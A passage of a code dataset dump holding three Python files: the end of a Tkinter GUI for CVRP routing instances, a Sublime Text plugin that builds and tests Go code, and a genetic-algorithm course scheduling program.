int(len(self.__matrizDistancias[i])*0.1)\n tenureDROP = int(len(self.__matrizDistancias[i])*0.1)+1\n \n self.__combo1[i].configure(state = \"readonly\")\n self.__combo1[i].set('Clark & Wright')\n \n #Tenure ADD y DROP\n self.__boxADD[i].set(tenureADD)\n self.__spinboxADD[i].configure(state = \"readonly\", textvariable=self.__boxADD[i])\n\n self.__boxDROP[i].set(tenureDROP)\n self.__spinboxDROP[i].configure(state = \"readonly\", textvariable=self.__boxDROP[i])\n \n #Tiempo\n self.__label_RecomiendacTiempo.append(tk.Label(text = \"Se recomienda como minimo\"))\n self.__label_RecomiendacTiempo[i].place(relx=0.30, rely=0.33)\n \n if(int(len(self.__matrizDistancias[i])) < 80):\n self.__eTime[i].set(1.0)\n elif(int(len(self.__matrizDistancias[i])) < 150):\n self.__eTime[i].set(3.0)\n else:\n self.__eTime[i].set(7.0)\n\n self.__entryTiempoEjecucion[i].configure(state = \"normal\", textvariable = self.__eTime[i])\n\n #Porcentaje\n self.__entryPorcentaje[i].configure(state = \"normal\", textvariable = self.__ePorcentaje[i])\n self.__ePorcentaje[i].set(0.1)\n\n return\n\n def listToString(self, s): \n str1 = \"\" \n for ele in s: \n str1 += ele \n\n return str1\n\n def tabs(self, instancias):\n for i in range(0,len(instancias)):\n print(instancias[i])\n self.__frames.append(tk.Frame(self)) \n self.menuConfig(self.__frames[i],i)\n self.__tabs.add(child=self.__frames[i],text=instancias[i])\n self.cargarDesdeFile(self.__mypath+\"/\"+self.__listaInstancias[i])\n self.calcularDatos(i)\n \n self.__tabs.pack(expand=1, fill=\"both\")\n self.__Ok = tk.Button(self, text = \"Calcular\", command=self.cargarDatos, width = 10, height =2, state=\"normal\")\n self.__Ok.pack(after=self.__tabs)\n\n def openFolder(self):\n self.__mypath = tk.filedialog.askdirectory(initialdir = \".\", title='Seleccione directorio con instancias')\n self.__listaInstancias = [f for f in listdir(self.__mypath) if isfile(join(self.__mypath, f))]\n self.__openFolder = True\n print(self.__listaInstancias)\n self.tabs(self.__listaInstancias)\n self.__nombreArchivo = os.path.splitext(self.__listaInstancias[0])[0]\n print(\"Primera instancia: \"+str(self.__nombreArchivo))\n \n def openFile(self):\n self.__listaInstancias = tk.filedialog.askopenfilenames(initialdir = \".\",title = \"Seleccione Intancia/s CVRP\",filetypes = ((\"all files\",\"*.*\"),(\"VRP files\",\"*.vrp\")))\n self.__listaInstancias = list(self.__listaInstancias)\n self.__mypath = ntpath.split(self.__listaInstancias[0])[0]\n self.__listaInstancias = [ntpath.split(f)[1] for f in self.__listaInstancias]\n self.tabs(self.__listaInstancias)\n self.__nombreArchivo = os.path.splitext(os.path.basename(self.__listaInstancias[0]))[0]\n \n #Obtengo los datos de mis archivos .vrp\n def cargarDesdeFile(self,pathArchivo):\n #+-+-+-+-+-Para cargar la distancias+-+-+-+-+-+-+-+-\n archivo = open(pathArchivo,\"r\")\n lineas = archivo.readlines()\n \n #Busco la posiciones de...\n try:\n indSeccionCoord = lineas.index(\"NODE_COORD_SECTION \\n\")\n lineaEOF = lineas.index(\"DEMAND_SECTION \\n\")\n except ValueError:\n try:\n indSeccionCoord = lineas.index(\"NODE_COORD_SECTION\\n\")\n lineaEOF = lineas.index(\"DEMAND_SECTION\\n\")\n except ValueError:\n indSeccionCoord = lineas.index(\"NODE_COORD_SECTION\\t\\n\")\n lineaEOF = lineas.index(\"DEMAND_SECTION\\t\\n\")\n \n #Linea optimo y nro de vehiculos\n lineaOptimo = [x for x in lineas[0:indSeccionCoord] if re.search(r\"COMMENT+\",x)][0]\n parametros = re.findall(r\"[0-9]+\",lineaOptimo)\n \n self.__nroVehiculos.append(int(float(parametros[0])))\n self.__optimo.append(float(parametros[1]))\n\n #Cargo la capacidad\n lineaCapacidad = [x for x in lineas[0:indSeccionCoord] if re.search(r\"CAPACITY+\",x)][0]\n parametros = re.findall(r\"[0-9]+\",lineaCapacidad)\n\n self.__capacidad.append(float(parametros[0]))\n print(\"Capacidad: \"+str(self.__capacidad[-1]))\n\n #Lista donde irán las coordenadas (vertice, x, y)\n coordenadas = []\n #Separa las coordenadas en una matriz, es una lista de listas (vertice, coordA, coordB)\n for i in range(indSeccionCoord+1, lineaEOF):\n textoLinea = lineas[i]\n textoLinea = re.sub(\"\\n\", \"\", textoLinea) #Elimina los saltos de línea\n splitLinea = textoLinea.split() #Divide la línea por \" \" \n if(splitLinea[0]==\"\"):\n coordenadas.append([splitLinea[1],splitLinea[2],splitLinea[3]]) #[[v1,x1,y1], [v2,x2,y2], ...]\n else:\n coordenadas.append([splitLinea[0],splitLinea[1],splitLinea[2]]) #[[v1,x1,y1], [v2,x2,y2], ...]\n #print(\"coordenadas: \"+str(coordenadas))\n self.cargaMatrizDistancias(coordenadas)\n \n #+-+-+-+-+-+-+-Para cargar la demanda+-+-+-+-+-+-+-\n seccionDemanda = [x for x in lineas[indSeccionCoord:] if re.findall(r\"DEMAND_SECTION+\",x)][0]\n indSeccionDemanda = lineas.index(seccionDemanda)\n \n seccionEOF = [x for x in lineas[indSeccionCoord:] if re.findall(r\"DEPOT_SECTION+\",x)][0]\n indLineaEOF = lineas.index(seccionEOF)\n\n demanda = []\n for i in range(indSeccionDemanda+1, indLineaEOF):\n textoLinea = lineas[i]\n textoLinea = re.sub(\"\\n\", \"\", textoLinea) #Elimina los saltos de línea\n splitLinea = textoLinea.split() #Divide la línea por \" \" \n try:\n demanda.append(float(splitLinea[1]))\n except:\n splitLinea = textoLinea.split()\n demanda.append(float(splitLinea[1]))\n #print(str(demanda))\n self.__demanda.append(demanda)\n \n def cargaMatrizDistancias(self, coordenadas):\n matriz = []\n #Arma la matriz de distancias. Calculo la distancia euclidea\n for coordRow in coordenadas:\n fila = [] \n for coordCol in coordenadas:\n x1 = float(coordRow[1])\n y1 = float(coordRow[2])\n x2 = float(coordCol[1])\n y2 = float(coordCol[2])\n dist = self.distancia(x1,y1,x2,y2)\n \n #Para el primer caso. Calculando la distancia euclidea entre si mismo da 0\n if(dist == 0 and float(coordRow[0])==float(coordCol[0])):\n dist = 999999999999\n fila.append(dist)\n\n #print(\"Fila: \"+str(fila)) \n matriz.append(fila)\n self.__matrizDistancias.append(np.array(matriz))\n\n def distancia(self, x1,y1,x2,y2):\n return round(math.sqrt((x1-x2)**2+(y1-y2)**2),3)\n \nventana = Ventana()\nventana.mainloop()","sub_path":"CVRP con dict/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":13865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360500815","text":"\nimport sys\nimport os\nfrom GoGdb3.sublimegdb import project_path\nfrom GoGdb3.sublimegdb import project_pathv\nfrom GoGdb3.sublimegdb import pkg_pathv\nfrom GoGdb3.sublimegdb import pkg_namev\nfrom GoGdb3.sublimegdb import GoBuilder\nfrom GoGdb3.sublimegdb import GDBView\nfrom GoGdb3.sublimegdb import get_setting\nfrom GoGdb3.sublimegdb import CmdThread\nfrom GoGdb3.sublimegdb import n_console_view\nimport re\nimport sublime\nimport sublime_plugin\nimport threading \nimport subprocess\nimport time\n\ndef plugin_loaded():\n\tfrom GoSublime.gosubl import gs\n\tfrom GoSublime.gosubl import mg9\n\timport gs9o\nDOMAIN = 'GssTest'\n\nTEST_PAT = re.compile(r'^((Test|Example|Benchmark)\\w*)')\nw_builders={}\nclass GssShowConsole(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\tprint(n_console_view.listener(self.window))\n\t\treturn n_console_view.listener(self.window)==None\n\tdef run(self):\n\t\tsublime.active_window().set_layout(\n\t\t\t{\n\t\t\t\"cols\": [0.0, 1.0],\n\t\t\t\"rows\": [0.0, 0.75, 1.0],\n\t\t\t\"cells\": [[0, 0, 1, 1],[0, 1, 1, 2]]\n\t\t\t})\n\t\tn_console_view.ShowConsoleView(self.window)\nclass GssShowDebug(sublime_plugin.TextCommand):\n\tdef run(self,edit):\n\t\t\"这是中文\".encode(\"utf-8\").decode(\"utf-8\")\n\t\tprint(\"runnnnn\")\nclass GssGs9oAddLine(sublime_plugin.TextCommand):\n\tdef run(self,edit,line):\n\t\timport gs9o\n\t\twin = self.view.window()\n\t\twid = win.id()\n\t\twd=gs9o.active_wd(win)\n\t\tid = gs9o._wdid(wd)\n\t\tst = gs9o.stash.setdefault(wid, {})\n\t\tv = st.get(id)\n\t\tif v is None:\n\t\t\tv = win.get_output_panel(id)\n\t\t\tst[id] = v\n\t\tv.insert(edit, v.size(), line)\n\t\tv.show(v.size())\nclass GssGs9oClear(sublime_plugin.TextCommand):\n\tdef run(self,edit):\n\t\timport gs9o\n\t\twin = self.view.window()\n\t\twid = win.id()\n\t\twd=gs9o.active_wd(win)\n\t\tid = gs9o._wdid(wd)\n\t\tst = gs9o.stash.setdefault(wid, {})\n\t\tv = st.get(id)\n\t\tif v is None:\n\t\t\tv = win.get_output_panel(id)\n\t\t\tst[id] = v\n\t\tv.replace(edit,sublime.Region(0, v.size()),\"\")\n\nclass OnSaveListener(sublime_plugin.EventListener):\n\tdef __init__(self):\n\t\tself.loading=False\n\tdef is_enabled(self):\n\t\taview=self.window.active_view()\n\t\tapath=aview.file_name()\n\t\treturn apath is not None and apath.find(\".go\")==len(apath)-3\n\tdef on_post_save(self,view):\n\t\tif self.loading:\n\t\t\treturn\n\t\tppath=project_pathv(view)\n\t\tpkg_n=pkg_pathv(ppath,view)\n\t\tif pkg_n==\"\":\n\t\t\treturn\n\t\tprint(\"on save build:\",pkg_n)\n\t\tapath=view.file_name()\n\t\timain=apath.find(\"main\")==len(apath)-4\n\t\tif imain:\n\t\t\treturn\n\t\tself.loading=True\n\t\tcmd=CmdThread(\"go install \"+pkg_n,ppath,None,None)\n\t\tcmd.start()\n\t\tcmd.join()\n\t\tself.loading=False\n\nclass GssSaveListener(sublime_plugin.EventListener):\n\tdef __init__(self):\n\t\tself.loading=False\n\tdef on_post_save(self,view):\n\t\tif self.loading and self.loading:\n\t\t\treturn\n\t\tself.loading=True\n\t\tapath=view.file_name()\n\t\tif apath.find(\".go\")!=len(apath)-3:\n\t\t\treturn\n\t\tapath=view.file_name()\n\t\titest=apath.find(\"_test.go\")==len(apath)-8\n\t\twid=view.window().id()\n\t\tg_builder=GoBuilder()\n\t\to_b=None\n\t\tif wid in w_builders:\n\t\t\to_b=w_builders[wid]\n\t\tif o_b is not None and o_b.is_running():\n\t\t\tg_builder.initEnv(itest,\"\",view,None)\n\t\telse:\n\t\t\tg_builder.initEnv(itest,\"\",view,n_console_view)\n\t\t# g_builder.showLView()\n\t\tg_builder.build(False)\n\t\tself.loading=False\n\tdef on_close(self,view):\n\t\tif view.name()==\"Console\":\n\t\t\tn_console_view.rm_listener(sublime.active_window())\n\t\t\tsublime.set_timeout(self.resetLayout, 1)\n\t\t\t# n_console_view.view=None\n\tdef resetLayout(self):\n\t\tsublime.active_window().set_layout(\n {\n \t\"cols\": [0.0, 1.0],\n \"rows\": [0.0, 1.0],\n \"cells\": [[0, 0, 1, 1]]\n }\n )\n\nclass GssStopCommand(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\tglobal w_builders\n\t\tg_builder=None\n\t\twid=self.window.id()\n\t\tif wid in w_builders:\n\t\t\tg_builder=w_builders[wid]\n\t\treturn g_builder is not None and g_builder.is_running()\n\tdef run(self):\n\t\tglobal w_builders\n\t\tg_builder=None\n\t\twid=self.window.id()\n\t\tif wid in w_builders:\n\t\t\tg_builder=w_builders[wid]\n\t\tif g_builder is not None:\n\t\t\tg_builder.bstop()\n\t\t\tg_builder.rstop()\nclass GssRunCommand(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\taview=self.window.active_view()\n\t\tapath=aview.file_name()\n\t\treturn apath is not None and apath.find(\".go\")==len(apath)-3\n\tdef run(self,debug=False):\n\t\tglobal w_builders\n\t\tg_builder=None\n\t\twid=self.window.id()\n\t\tif wid in w_builders:\n\t\t\tg_builder=w_builders[wid]\n\t\tif (g_builder is not None) and (g_builder.is_running()):\n\t\t\ttview=self.window.active_view()\n\t\t\tn_console_view.add_line(tview,\"Builder already running\\n\")\n\t\t\treturn\n\t\taview=self.window.active_view()\n\t\tapath=aview.file_name()\n\t\tif apath.find(\"_test.go\")==len(apath)-8:\n\t\t\tself.window.run_command(\"gss_test\")\n\t\t\treturn\n\t\tg_builder=GoBuilder()\n\t\tg_builder.initEnv(False,\"\",self.window.active_view(),n_console_view)\n\t\tw_builders[wid]=g_builder\n\t\tg_builder.run()\n\t\t# aview.run_command('gs9o_open', {'run': ['sh',gb.sbinp(),gb.args],'wd': project_path(self.window)})\n\t\t\nclass GssTestCommand(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\tfrom GoSublime.gosubl import gs\n\t\treturn gs.is_go_source_view(self.window.active_view())\n\tdef run(self,debug=False):\n\t\tfrom GoSublime.gosubl import gs\n\t\tfrom GoSublime.gosubl import mg9\n\t\tglobal w_builders\n\t\tg_builder=None\n\t\twid=self.window.id()\n\t\tif wid in w_builders:\n\t\t\tg_builder=w_builders[wid]\n\t\tif (g_builder is not None) and (g_builder.is_running()):\n\t\t\tg_builder.showLView()\n\t\t\treturn\n\t\tpkg_dir = ''\n\t\tdef f(res, err):\n\t\t\tif err:\n\t\t\t\tgs.notify(DOMAIN, err)\n\t\t\t\treturn\n\t\t\tmats = {}\n\t\t\targs = {}\n\t\t\tdecls = res.get('file_decls', [])\n\t\t\tdecls.extend(res.get('pkg_decls', []))\n\t\t\tfor d in decls:\n\t\t\t\tname = d['name']\n\t\t\t\tprefix, _ = match_prefix_name(name)\n\t\t\t\tif prefix and d['kind'].index('func')>-1 and d['repr'] == '':\n\t\t\t\t\tmats[True] = prefix\n\t\t\t\t\targs[name] = name\n\n\t\t\tnames = sorted(args.keys())\n\t\t\tents = ['Run all tests and examples']\n\t\t\tfor k in ['Test', 'Benchmark', 'Example']:\n\t\t\t\tif mats.get(k):\n\t\t\t\t\ts = 'Run %ss Only' % k\n\t\t\t\t\tents.append(s)\n\t\t\t\t\tif k == 'Benchmark':\n\t\t\t\t\t\targs[s] = ['-test.run=none', '-test.bench=\"%s.*\"' % k]\n\t\t\t\t\telse:\n\t\t\t\t\t\targs[s] = ['-test.run=\"%s.*\"' % k]\n\n\t\t\tfor k in names:\n\t\t\t\tents.append(k)\n\t\t\t\tif k.startswith('Benchmark'):\n\t\t\t\t\targs[k] = ['-test.run=none', '-test.bench=\"^%s$\"' % k]\n\t\t\t\telse:\n\t\t\t\t\targs[k] = ['-test.run=^%s$' % k]\n\n\t\t\tdef cb(i, win):\n\t\t\t\tif i >= 0:\n\t\t\t\t\ta = args.get(ents[i], [])\n\t\t\t\t\tsargs=\"\"\n\t\t\t\t\tif len(a)>0:\n\t\t\t\t\t\tsargs=a[0]\n\t\t\t\t\t# print sargs\n\t\t\t\t\tif debug:\n\t\t\t\t\t\twin.run_command('gdb_launch', {'test':True,'trun':sargs})\n\t\t\t\t\telse:\n\t\t\t\t\t\tglobal g_builder\n\t\t\t\t\t\tg_builder=GoBuilder()\n\t\t\t\t\t\tg_builder.initEnv(True,sargs,self.window.active_view(),n_console_view)\n\t\t\t\t\t\tg_builder.rcwd=pkg_dir\n\t\t\t\t\t\tg_builder.run()\n\n\t\t\tgs.show_quick_panel(ents, cb)\n\n\t\twin, view = gs.win_view(None, self.window)\n\t\tif view is None:\n\t\t\treturn\n\n\t\tvfn = gs.view_fn(view)\n\t\tsrc = gs.view_src(view)\n\t\tif view.file_name():\n\t\t\tpkg_dir = os.path.dirname(view.file_name())\n\n\t\tmg9.declarations(vfn, src, pkg_dir, f)\n\n\ndef match_prefix_name(s):\n\tm = TEST_PAT.match(s)\n\treturn (m.group(2), m.group(1)) if m else ('', '')\n\ndef handle_action(view, action):\n\tfn = view.file_name()\n\tprefix, name = match_prefix_name(view.substr(view.word(gs.sel(view))))\n\tok = prefix and fn and fn.endswith('_test.go')\n\tif ok:\n\t\tif action == 'right-click':\n\t\t\tpat = '^%s.*' % prefix\n\t\telse:\n\t\t\tpat = '^%s$' % name\n\n\t\tif prefix == 'Benchmark':\n\t\t\tcmd = ['go', 'test', '-test.run=none', '-test.bench=\"%s\"' % pat]\n\t\telse:\n\t\t\tcmd = ['go', 'test', '-test.run=\"%s\"' % pat]\n\n\t\tview.run_command('gs9o_open', {'run': cmd})\n\n\treturn ok\n","sub_path":"gsstest.py","file_name":"gsstest.py","file_ext":"py","file_size_in_byte":7580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451151324","text":"import random \nimport time\nimport copy\n\nNUMBER_OF_SCHEDULES = 100\nNUMBER_OF_GENERATIONS = 10\nMAX_NUMBER_OF_SCHEDULES = 200\nOUTPUT_FILE_NAME = \"out.txt\"\n\ndef convertListToInt(li):\n\tnewli = []\n\tfor x in li:\n\t\tnewli.append(int(x))\n\treturn newli\n\nclass Course:\n\tdef __init__(self, courseId, prof):\n\t\tself.courseId = courseId\n\t\tself.prof = prof\n\n\tdef getProf(self):\n\t\treturn self.prof\n\n\tdef getCourseId(self):\n\t\treturn self.courseId\n\nclass Schedule:\n\tdef __init__(self, days, timeSlots, courses=[]):\n\t\tself.plan = []\n\t\tself.days = days\n\t\tself.timeSlots = timeSlots\n\t\tself.sumHappiness = 0\n\t\tself.sumSadness = 0\n\t\t# self.happiness = happiness\n\t\t# self.sadness = sadness\n\t\tself.courses = courses[:]\n\t\tself.makeEmptyPlan()\n\t\tself.createPlan()\n\t\n\tdef gettimeSlots(self):\n\t\treturn self.timeSlots\n\t\n\tdef getdays(self):\n\t\treturn self.days\n\n\tdef makeEmptyPlan(self):\t\t\n\t\tfor _ in range(self.days):\n\t\t\tline = []\n\t\t\tfor _ in range(self.timeSlots):\n\t\t\t\tline.append([Course(-1, -1)])\n\t\t\tself.plan.append(line)\n\n\tdef PlaceInFirstEmptySpace(self, index):\n\t\tfor day_ in range(len(self.plan)):\n\t\t\tfor timeSlot_ in range(len(self.plan[0])):\n\t\t\t\tif self.plan[day_][timeSlot_][0].getCourseId()==-1:\n\t\t\t\t\tself.plan[day_][timeSlot_][0] = self.courses[index]\n\t\t\t\t\treturn 1\n\t\treturn -1\n\n\n\tdef hasConflict(self, index, courseList = []):\n\t\tfor item in courseList:\n\t\t\tif item.getProf() == self.courses[index].getProf():\n\t\t\t\treturn True\n\t\treturn False \n\n\n\tdef putInRandomPossiblePlace(self, index):\n\t\ttry_times = 0\n\t\twhile try_times<20:\n\t\t\tday_ = int((random.random())*100)%(self.days)\n\t\t\ttimeSlot_ = int((random.random())*100)%(self.timeSlots)\n\t\t\tif self.hasConflict(index, self.plan[day_][timeSlot_])==False:\n\t\t\t\tself.plan[day_][timeSlot_].append(self.courses[index])\n\t\t\t\treturn 1\n\t\t\ttry_times +=1\n\n\t\treturn -1 \n\t\t\t\n\n\tdef createPlan(self):\n\t\tli = []\n\t\twhile len(self.courses)>0:\n\t\t\tindex = int((random.random())*100)%(len(self.courses))\n\t\t\tif (self.courses[index].getCourseId() in li)==False:\n\t\t\t\temptySpace = self.PlaceInFirstEmptySpace(index)\n\t\t\t\tif emptySpace==-1:\n\t\t\t\t\tbreak\n\t\t\t\tli.append(self.courses[index].getCourseId())\n\t\t\t#self.sumHappiness += self.happiness[self.courses[index].getCourseId()-1]\n\t\t\tdel self.courses[index]\n\t\twhile len(self.courses)>0:\n\t\t\tindex = int((random.random())*100)%(len(self.courses))\n\t\t\tif (self.courses[index].getCourseId() in li)==False:\n\t\t\t\temptySpace = self.putInRandomPossiblePlace(index)\n\t\t\t\tif emptySpace!=-1:\n\t\t\t\t\t#print(\"Can't Have Course \"+str(self.courses[index].getCourseId())+\" This Semester\")\n\t\t\t\t\tli.append(self.courses[index].getCourseId())\n\t\t\t\t# else:\n\t\t\t\t\t#self.sumHappiness += self.happiness[self.courses[index].getCourseId()-1]\n\t\t\tdel self.courses[index]\n\n\n\tdef fitness(self ,happiness = [] , sadness = []):\n\t\tself.sumHappiness = 0\n\t\tself.sumSadness = 0\n\t\tfor d in self.plan:\n\t\t\tfor t in d:\n\t\t\t\tfor ncindex in range(len(t)):\n\t\t\t\t\tif t[ncindex].getCourseId() != -1:\n\t\t\t\t\t\tself.sumHappiness += int(happiness[t[ncindex].getCourseId()-1])\n\t\t\t\t\t\tfor nrindex in range(ncindex+1, len(t)):\n\t\t\t\t\t\t\tif t[nrindex].getCourseId() != -1:\n\t\t\t\t\t\t\t\tif t[nrindex].getCourseId() != t[ncindex].getCourseId():\n\t\t\t\t\t\t\t\t\tself.sumSadness += int(sadness[t[ncindex].getCourseId()-1][t[nrindex].getCourseId()-1])\n\t\ttotalFitness = self.sumHappiness - self.sumSadness \n\t\treturn totalFitness\n\n\t# def sortPlan(self):\n\t# \tfor day in range(len(self.plan)):\n\t# \t\tfor time in range(len(self.plan[day])):\n\t# \t\t\tfor course in range(len(self.plan[day][time])):\n\t# \t\t\t\tfor course2 in range(0, course):\n\t# \t\t\t\t\tif self.plan[day][time][course].getCourseId() < self.plan[day][time][course2].getCourseId():\n\t# \t\t\t\t\t\ttemp = copy.deepcopy(self.plan[day][time][course])\n\t# \t\t\t\t\t\tself.plan[day][time][course] = copy.deepcopy(self.plan[day][time][course2])\n\t# \t\t\t\t\t\tself.plan[day][time][course] = copy.deepcopy(temp)\n\n\tdef printOutput(self, fitness):\n\t\t# self.sortPlan()\n\t\tfile = open(OUTPUT_FILE_NAME, 'w')\n\t\tfile.write(str(fitness)+'\\n')\n\t\tfor day in range(len(self.plan)):\n\t\t\tfor time in range(len(self.plan[day])):\n\t\t\t\tfor course in range(len(self.plan[day][time])):\n\t\t\t\t\tif self.plan[day][time][course].getCourseId() != -1:\n\t\t\t\t\t\tdata = str(day+1)+\" \"+str(time+1)+\" \"+str(self.plan[day][time][course].getCourseId())+\" \"+ str(self.plan[day][time][course].getProf())\n\t\t\t\t\t\tfile.write(data+'\\n')\n\t\t\t\t\t\t#print(data)\n\t\tfile.close()\n\tdef printPlan(self):\n\t\tprintedPlan = []\n\t\tfor day in self.plan:\n\t\t\tprintedPlan.append([])\n\t\t\tfor time in day:\n\t\t\t\tprintedPlan[-1].append([])\n\t\t\t\tfor course in time:\n\t\t\t\t\tif course != -1:\n\t\t\t\t\t\tprintedPlan[-1][-1].append(course.getCourseId())\n\t\t\t\t\telse:\n\t\t\t\t\t\tprintedPlan[-1][-1].append(-1)\n\t\tprint(\"Plan:\"+str(printedPlan))\n\n\n\tdef getPlan(self):\n\t\treturn self.plan\n\n\tdef getDayAndTime(self, dayRand1, timeRand1):\n\t\treturn self.plan[dayRand1][timeRand1]\n\n\tdef setPlan(self, plan):\n\t\tself.plan = copy.deepcopy(plan)\n\n\n\tdef FixDuplicate(self):\n\t\t# addedCourses = []\n\t\t# for day in value:\n\t\t# \tfor time in day:\n\t\t# \t\tfor course in time:\n\t\t# \t\t\taddedCourses.append(course.getCourseId())\n\t\t# print(addedCourses)\n\t\t# if changedPart == 0:\n\t\t# \tfor day in self.plan[len(value)-1:]:\n\t\t# \t\tfor time in day:\n\t\t# \t\t\tfor course in time:\n\t\t# \t\t\t\tif course.getCourseId() != -1:\n\t\t# \t\t\t\t\tif course.getCourseId() in addedCourses:\n\t\t# \t\t\t\t\t\tcourse = Course(-1, -1)\n\t\t# else:\n\t\t# \tfor day in self.plan[:len(value)]:\n\t\t# \t\tfor time in day:\n\t\t# \t\t\tfor course in time:\n\t\t# \t\t\t\tif course.getCourseId() != -1:\n\t\t# \t\t\t\t\tif course.getCourseId() in addedCourses:\n\t\t# \t\t\t\t\t\tcourse = Course(-1, -1)\n\t\tseenCourses = []\n\t\tfor day in range(len(self.plan)):\n\t\t\tfor time in range(len(self.plan[day])):\n\t\t\t\tfor course in range(len(self.plan[day][time])):\n\t\t\t\t\tif self.plan[day][time][course].getCourseId() != -1:\n\t\t\t\t\t\tif self.plan[day][time][course].getCourseId() in seenCourses:\n\t\t\t\t\t\t\tself.plan[day][time][course] = Course(-1, -1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tseenCourses.append(self.plan[day][time][course].getCourseId())\n\n\n\n\tdef changedDateAndTime(self, value):\n\t\tchangedPart = int(random.random()*100)%2\n\t\tif changedPart==0:\n\t\t\tsize = len(value)\n\t\t\tself.plan[0:size] = copy.deepcopy(value) \n\t\telse:\n\t\t\tsize = len(value)\n\t\t\tself.plan[len(self.plan)-size:] = copy.deepcopy(value)\n\t\t#temp = self.plan[day][time]\n\t\t#self.plan[day][time] = value \n\t\tself.FixDuplicate()\n\n\tdef mutate(self):\n\t\tfor _ in range(self.days*self.timeSlots):\n\t\t\twhile True:\t\n\t\t\t\tdayRand = int(random.random()*100)%self.days\n\t\t\t\ttimeRand = int(random.random()*100)%self.timeSlots\n\t\t\t\tif len(self.plan[dayRand][timeRand])>0:\n\t\t\t\t\tcourseRand = int(random.random()*100)%(len(self.plan[dayRand][timeRand]))\n\t\t\t\t\tbreak\n\t\t\tthisCourse = self.plan[dayRand][timeRand][courseRand]\n\t\t\tdel self.plan[dayRand][timeRand][courseRand]\n\t\t\tself.courses.append(thisCourse)\n\t\t\tself.putInRandomPossiblePlace(0)\n\n\tdef beforeDay(self, midDay):\n\t\treturn self.plan[0:midDay]\n\n\n\tdef afterDay(self, midDay):\n\t\treturn self.plan[midDay:]\n\n\nclass AllSchedules:\n\tdef __init__(self, count, days, timeSlots, courses=[], happiness=[], sadness=[]):\n\t\tself.happiness = happiness\n\t\tself.sadness = sadness\n\t\tself.count = count\n\t\tself.schedules = []\n\t\tself.days = days\n\t\tself.timeSlots = timeSlots\n\t\tself.courses = courses\n\t\tself.expectedVal = 0\n\t\tself.calcExpectedVal()\n\n\tdef createSchedules(self):\n\t\tnow = time.time()\t\n\t\tfor i in range(self.count):\n\t\t\t#print(\"Plan: \"+str(i))\n\t\t\tsch = Schedule(self.days, self.timeSlots, self.courses)\n\t\t\tself.schedules.append(sch)\n\t\tlater = time.time()\n\t\tdifference = int(later - now)\n\t\tprint(\"Population Creation: \"+str(difference)+\" Seconds\")\n\n\n\tdef Calcfitness(self, plan):\n\t\treturn plan.fitness(self.happiness, self.sadness)\n\n\n\tdef swapSchedules(self, plan1index, plan2index):\n\t\ttemp = self.schedules[plan1index]\n\t\tself.schedules[plan1index] = self.schedules[plan2index]\n\t\tself.schedules[plan2index] = temp\n\n\n\tdef sortSchedulesList(self):\t\t\n\t\tfor plan1index in range(len(self.schedules)-1):\n\t\t\tfor plan2index in range(0, plan1index):\n\t\t\t\tif self.Calcfitness(self.schedules[plan2index+1]) > self.Calcfitness(self.schedules[plan2index]):\n\t\t\t\t\tself.swapSchedules(plan2index+1, plan2index)\n\n\t\t# for plan in self.schedules:\n\t\t# \tprint(self.Calcfitness(plan))\n\n\tdef createNewPlan(self, plan, changedValue):\n\t\tthisPlan = plan[:]\n\t\tnewPlan = Schedule(self.days, self.timeSlots, [])\n\t\tnewPlan.setPlan(thisPlan)\n\t\tnewPlan.changedDateAndTime(changedValue)\n\t\tself.schedules.append(newPlan)\n\n\tdef crossOver(self):\n\t\t# print(\"crossover\")\n\t\t#print(\"here\")\n\t\texpert = self.schedules[0:20]\n\t\tfor plan1 in expert:\n\t\t\tif int(random.random()*100)%5 == 1 and len(self.schedules)>4:\n\t\t\t\tplan2index = int(random.random()*100)%4\n\t\t\t\t#print(plan2index)\n\t\t\telse:\n\t\t\t\tplan2index = int(random.random()*100)%(len(self.schedules))\n\t\t\t\t#print(plan2index)\n\n\t\t\tmidDay = int(self.days/2)\n\n\t\t\tdayAndTime1 = plan1.beforeDay(midDay)[:]\n\t\t\tdayAndTime2 = self.schedules[plan2index].afterDay(midDay)[:]\n\t\t\tself.createNewPlan(plan1.getPlan(), dayAndTime2)\n\t\t\tself.createNewPlan(self.schedules[plan2index].getPlan(), dayAndTime1)\n\n\t\t\t# print(self.Calcfitness(self.schedules[0]))\n\n\n\tdef createNewPlanWithMutation(self, plan):\n\t\tnewPlan = Schedule(self.days, self.timeSlots, [])\n\t\tnewPlan.setPlan(plan)\n\t\tnewPlan.mutate()\n\t\tself.schedules.append(newPlan)\n\n\tdef mutation(self):\n\t\tprint('mutating')\n\t\tplanindex = int(random.random()*100)%(int(len(self.schedules)/2))\n\t\tif planindex+20MAX_NUMBER_OF_SCHEDULES:\n\t\t\t#print(self.Calcfitness(self.schedules[-1]))\n\t\t\tdel self.schedules[-1]\n\n\tdef sortCourses(self, temp):\n\t\tfor i in range(len(temp)-1, 0, -1):\n\t\t\tfor j in range(i):\n\t\t\t\tif self.happiness[temp[j].getCourseId()-1] > self.happiness[temp[j+1].getCourseId()-1]:\n\t\t\t\t\ttempTemp = temp[j]\n\t\t\t\t\ttemp[j] = temp[j+1]\n\t\t\t\t\ttemp[j+1] = tempTemp\n\n\n\tdef calcExpectedVal(self):\n\t\ttemp = self.courses[:]\n\t\tself.sortCourses(temp)\n\t\tfor i in range(int(self.days*self.timeSlots)):\n\t\t\tself.expectedVal += int(self.happiness[temp[i].getCourseId()-1])\n\n\tdef reachBestSchedule(self):\n\t\tprevMax = 0\n\t\tnumberOfGenerations = NUMBER_OF_GENERATIONS\n\t\tself.sortSchedulesList()\n\t\twhile True:\n\t\t\tnow = time.time()\n\t\t\tnumberOfGenerations -= 1\n\t\t\tnewMax = self.Calcfitness(self.schedules[0])\n\t\t\tprint(\"Max: \"+str(newMax))\n\t\t\t#if newMax>self.expectedVal or numberOfGenerations==0 or abs(newMax-prevMax)<50:\n\t\t\tif numberOfGenerations==0 or abs(newMax-prevMax)<50:\n\t\t\t# if numberOfGenerations==0:\n\t\t\t\tbreak\n\t\t\tprevMax = 